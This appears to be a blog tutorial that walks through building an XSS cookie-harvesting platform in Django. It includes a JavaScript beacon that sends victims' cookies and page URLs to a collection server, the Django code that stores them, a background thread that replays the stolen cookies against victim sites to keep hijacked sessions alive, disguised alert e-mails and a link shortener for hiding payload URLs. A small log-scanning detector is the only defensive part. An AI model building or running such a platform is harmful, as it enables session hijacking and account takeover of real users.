Steps for writing a simple XSS platform with Django
1) Brief description
The principle is really simple (lol), the code is clumsy, gurus please don't flame me >_<
2) Prerequisites
- Basic principles of XSS attacks and how they are exploited
- Using the Django framework
3) Let's start
0x01
To do a good job, one must first sharpen one's tools. First we need to prepare the tools and environment for writing the code; I won't go into detail here. My environment and tools are as follows:
- python 3.7.0
- pycharm
- windows 10
- mysql 8.0.15
- Django 2.1.3
Third-party libraries required:
- django
- pymysql
- requests
0x02
Let's first look at how the XSS script works:
```javascript
// Address of the XSS platform that receives the data.
var website = "http://127.0.0.1";
(function() {
  // An <img> request carries the collected values as GET parameters; each getter is
  // wrapped in try/catch so a cross-origin access error does not abort the whole script.
  (new Image()).src = website + '/?keepsession=1&location=' +
    escape((function() { try { return document.location.href } catch(e) { return '' } })()) +
    '&toplocation=' + escape((function() { try { return top.location.href } catch(e) { return '' } })()) +
    '&cookie=' + escape((function() { try { return document.cookie } catch(e) { return '' } })()) +
    '&opener=' + escape((function() { try { return (window.opener && window.opener.location.href) ? window.opener.location.href : '' } catch(e) { return '' } })());
})();
```
This code is very simple: it collects useful information with JavaScript and then sends it to the server as GET parameters by requesting a URL on the XSS platform.
Note: using AJAX here may run into CORS cross-origin problems.
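The beacon above has a recognisable shape in a web server's access log, which is the defender's side of this design. The following Python is an added example (not code from the original post): it flags such requests in Combined Log Format lines; the log lines are constructed for the demo and the "at least two characteristic parameters, one data-bearing" threshold is my own assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameter names appended by the beacon script in section 0x02.
BEACON_PARAMS = {"keepsession", "location", "toplocation", "cookie", "opener"}
DATA_FIELDS = {"cookie", "location", "opener"}

# Minimal Combined Log Format parser (client ip, request line, status, referer, user agent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def beacon_findings(line):
    """Return a dict describing a suspected exfil beacon, or None for a benign request."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # parse_qs undoes the JavaScript escape() encoding (%3A -> ':', %3D -> '=', ...).
    qs = parse_qs(urlsplit(m.group("target")).query)
    hit = BEACON_PARAMS & set(qs)
    # Assumed threshold: at least two characteristic names, one of them data-bearing,
    # so an ordinary '?location=/home' redirect parameter on its own is not flagged.
    if len(hit) < 2 or not (hit & DATA_FIELDS):
        return None
    return {
        "client": m.group("ip"),
        "victim_page": qs.get("location", [""])[0],   # the page the script ran on
        "cookie_leaked": bool(qs.get("cookie", [""])[0]),
        "keep_session": qs.get("keepsession", ["0"])[0] == "1",
        "fields": sorted(hit),
    }

def scan(lines):
    return [f for f in (beacon_findings(l) for l in lines) if f]

# Constructed sample log lines (not real traffic): one beacon, one static file, one benign redirect.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2019:12:00:01 +0800] "GET /?keepsession=1&location=http%3A//shop.example/cart'
    '&toplocation=http%3A//shop.example/cart&cookie=sessionid%3Dabc123&opener= HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2019:12:00:05 +0800] "GET /static/app.js HTTP/1.1" 200 1024 "http://shop.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2019:12:00:09 +0800] "GET /login?location=/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because Django enables SESSION_COOKIE_HTTPONLY by default, document.cookie does not expose the session cookie to this script, but the location and opener fields still leak, and only a CSP img-src restriction on the victim site stops the image beacon itself.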
0x03
First the key code; everything else is ordinary Django material and is not discussed here.
```python
# getscript.py (module name taken from the import in the next file)
""" Dynamically return the matching JavaScript code for a given url value """
import os
import pymysql
from user.safeio import re_check


def get_info(url):
    # Only identifiers made of digits and letters are allowed before the database is touched.
    if not re_check(url, 'num_letter'):
        return 'default'
    db = pymysql.connect(host='localhost', user='root', password='root', database='xss')
    try:
        cursor = db.cursor()
        # Parameterised query: the driver quotes url, so no string concatenation is needed.
        cursor.execute("SELECT name FROM projects WHERE url = %s", (url,))
        row = cursor.fetchone()
    finally:
        db.close()
    # fetchone() returns None when no project matches; fall back to the default script.
    if row is None or row[0] is None:
        return 'default'
    return row[0]


def get_js_value(url):
    js_name = get_info(url)
    # os.path.join works on both Windows and Linux (the original hard-coded '\\script\\').
    path = os.path.join(os.getcwd(), 'script', js_name + '.js')
    with open(path, encoding='utf-8') as f:
        js_value = f.read()
    # The placeholder <-1234-> inside the script is replaced with the project url.
    return js_value.replace('<-1234->', url)
```
```python
import time
import pymysql
from .getscript import get_info


def connect(retries=3):
    # Bounded retry; the original recursed on failure and returned None to its caller.
    for attempt in range(retries):
        try:
            db = pymysql.connect(host='localhost', user='root', password='root', database='xss')
            return db, db.cursor()
        except pymysql.MySQLError:
            print('Database connection failed, retrying')
            time.sleep(1)
    raise RuntimeError('could not connect to MySQL after %d attempts' % retries)


def put_letter(request, url):
    now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())[2:]
    # X-Forwarded-For is client-controlled unless a trusted reverse proxy sets it.
    if 'HTTP_X_FORWARDED_FOR' in request.META:
        ip = request.META['HTTP_X_FORWARDED_FOR']
    else:
        ip = request.META.get('REMOTE_ADDR', '0.0.0.0')
    origin = request.GET.get('location', 'Unknown')
    software = request.META.get('HTTP_USER_AGENT', 'Unknown')
    method = request.method
    data = request.GET.get('cookie', 'No data')
    keep_alive = request.GET.get('keepsession', '0')
    # The original escaped quotes with replace("'", "\'"), which is a no-op in Python;
    # the values are now bound as query parameters in put_mysql instead.
    put_mysql([now_time, ip, origin, software, method, data, keep_alive], url)


def put_mysql(values, url):
    db, cursor = connect()
    try:
        name = get_info(url)
        cursor.execute("SELECT user FROM projects WHERE url = %s", (url,))
        row = cursor.fetchone()
        user = row[0] if row else None
        now_time, ip, origin, software, method, data, keep_alive = values
        m_query = ("INSERT INTO letters(time,name,ip,origin,software,method,data,user,keep_alive) "
                   "VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)")
        cursor.execute(m_query, (now_time, name, ip, origin, software, method, data, user, keep_alive))
        db.commit()
    finally:
        db.close()


def get_letters(username):
    db, cursor = connect()
    try:
        cursor.execute("SELECT * FROM letters WHERE user = %s", (username,))
        return cursor.fetchall()
    finally:
        db.close()
```
Since we know the XSS script passes the collected information to the XSS platform as GET parameters, all the server has to do is receive that data and save it.
0x04
We can add new features to round out the platform, such as e-mail notifications and keeping cookies "alive".
```python
# coding=utf-8
''' E-mail sending '''
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr

my_sender = 'xxxx'   # sending address
my_pass = 'xxxx'     # SMTP password / authorisation code


def send_mail(user_mail):
    try:
        print(user_mail)
        msg = MIMEText('您点的外卖已送达,请登录平台查询', 'plain', 'utf-8')
        msg['From'] = formataddr(["XSS平台", my_sender])
        msg['To'] = formataddr(["顾客", user_mail])
        msg['Subject'] = "您点的外卖已送达,请登录平台查询"
        server = smtplib.SMTP_SSL("smtp.qq.com", 465)
        server.login(my_sender, my_pass)
        server.sendmail(my_sender, [user_mail], msg.as_string())
        server.quit()
    except Exception as e:
        # The original swallowed every error silently; at least report it.
        print('send_mail failed:', e)
```
```python
# keep_alive.py (module name taken from the import in manage.py below)
'''
Use a thread separate from the main thread to keep the cookie information of the
generic ("default") project "alive". By default it is kept alive for one hour.
'''
import queue
import time
from datetime import datetime, timedelta

import pymysql
import requests

Cookie_Time = 1   # hours


def count_time(now=None):
    # Timestamp of Cookie_Time hours ago, in the same 'YY-MM-DD HH:MM:SS' form stored in letters.
    # (The original did this with hand-written calendar arithmetic, which broke at month
    # boundaries and subtracted 5 hours instead of Cookie_Time.)
    now = now or datetime.now()
    return (now - timedelta(hours=Cookie_Time)).strftime('%Y-%m-%d %H:%M:%S')[2:]


def create_queue():
    cookie_queue = queue.Queue()
    dec_time = count_time()
    db = pymysql.connect(host='127.0.0.1', user='root', password='root', database='xss')
    try:
        cursor = db.cursor()
        cursor.execute(
            "SELECT software, origin, data FROM letters "
            "WHERE name = 'default' AND time > %s AND keep_alive = '1'",
            (dec_time,))
        for row in cursor.fetchall():
            cookie_queue.put(row)
    finally:
        db.close()
    return cookie_queue


def action():
    while True:
        time.sleep(60)
        task_queue = create_queue()
        while not task_queue.empty():
            ua, url, cookie = task_queue.get()
            headers = {'User-Agent': ua, 'Cookie': cookie}
            try:
                requests.get(url, headers=headers, timeout=10)
            except requests.RequestException:
                pass
```
Note that this needs a thread separate from the Django main thread; for example, I added the following to manage.py:
```python
import threading
from xssplatform.keep_alive import action


class keep_Thread(threading.Thread):
    def __init__(self):
        super(keep_Thread, self).__init__()
        # Daemon thread, so it does not keep the process alive after the server exits.
        self.daemon = True

    def run(self):
        action()


if __name__ == '__main__':
    th = keep_Thread()
    th.start()
```
Short links:
```python
''' Short link generation using the c7.gg API '''
import json
import requests

Headers = {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-encoding": "gzip, deflate, br",
    "accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "origin": "https://www.985.so",
    "referer": "https://www.985.so/",
    "user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
}
# The original also hard-coded "content-length": "53"; requests computes the real length, so it is dropped.


def url_to_short(url):
    data = {'type': 'c7', 'url': url}
    r = requests.post('https://create.ft12.com/done.php?m=index&a=urlCreate',
                      data=data, headers=Headers, timeout=10)
    result = json.loads(r.text)
    return result['list']
```
4) Finally
The XSS platform that looks so impressive is actually that simple in principle; the genuinely hard part is writing the cross-site scripts themselves.
This project is open source on GitHub; if you have any questions, submit an issue and I will reply as soon as I can.
That's all for this article. I hope it helps with your studies, and I hope you will keep supporting 脚本之家.